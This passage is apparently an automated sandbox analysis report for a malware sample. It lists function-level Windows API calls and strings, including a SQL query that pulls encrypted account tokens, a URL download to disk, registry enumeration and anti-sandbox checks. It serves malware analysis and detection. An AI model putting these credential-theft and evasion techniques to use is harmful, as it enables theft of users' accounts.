Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,02D75648), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: aa8a7716d2caebc3f0fee95ec8f8c2674a5549ba908356bdff9b12537e65a0fb
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: aa8a7716d2caebc3f0fee95ec8f8c2674a5549ba908356bdff9b12537e65a0fb
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB
AccountId, xrefs: 0040B472
AccountTokens, xrefs: 0040B28A
AccountTokens, xrefs: 0040B319

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: 3ab50779078bee03c147ab3ccd8c1bd2ae9931293fdb012c668c514da9b46b46
Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: 3ab50779078bee03c147ab3ccd8c1bd2ae9931293fdb012c668c514da9b46b46
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,02D78390,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,02D78258,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.ADVAPI32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 523a87c804e1029e1ba3480052583fc70d0894c5bac8d273530debff4ee2d655
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: 523a87c804e1029e1ba3480052583fc70d0894c5bac8d273530debff4ee2d655
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D31B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
Opcode ID: c6c2cc0c5700292bd11ed3b71b6c3a56036e1d970a8218521193bfa127251a67
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: c6c2cc0c5700292bd11ed3b71b6c3a56036e1d970a8218521193bfa127251a67
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D36D70), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D36CF8), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D36DA0), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D36D10), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D36D28), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D755C8), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D5EBB0), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D5E930), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D759C8), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D759F8), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D75890), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D75A28), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D5ECD0), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,02D75938), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02D755D8,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02D754F8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,02D754F8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1175201934-0
Opcode ID: 466e30400b452d8de00f7ab2a2e6fa4e6701d9e4b3183216076be2e723dd6b11
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: 466e30400b452d8de00f7ab2a2e6fa4e6701d9e4b3183216076be2e723dd6b11
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 6C6DC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C6DC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C6DC969
GetSystemInfo.KERNEL32(?), ref: 6C6DC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C6DC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C6DC9E2

Memory Dump Source

Source File: 00000000.00000002.3276857349.000000006C6C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.3276841824.000000006C6C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.3276907744.000000006C73D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.3276927792.000000006C74E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.3276942673.000000006C752000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_c4RAHq3BNl.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 7b10c12b150b65128b5bb758dbc7213c85ab402017290b37de05157168d9f821
Instruction ID: 3106be2bbb62eecbeaa3708393ccff10b5b68346d1f23fae88d726054f81c405
Opcode Fuzzy Hash: 7b10c12b150b65128b5bb758dbc7213c85ab402017290b37de05157168d9f821
Instruction Fuzzy Hash: D421FF31741618BBD714BA24DC84BAE7379AB8670CF61412BF9079B680D7707C048799

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,02D360B8,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,02D78940,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,02D36278,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,02D78330,00000000,00000000,000000FF,000000FF), ref: 0041435C
RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(02D754A8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(02D788A0,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02D754F8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(02D754A8,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: 87c4ecc5cae1bb30076c5fa7cae4b4b31d77e3e1fa7da15e9efafcded89b07fc
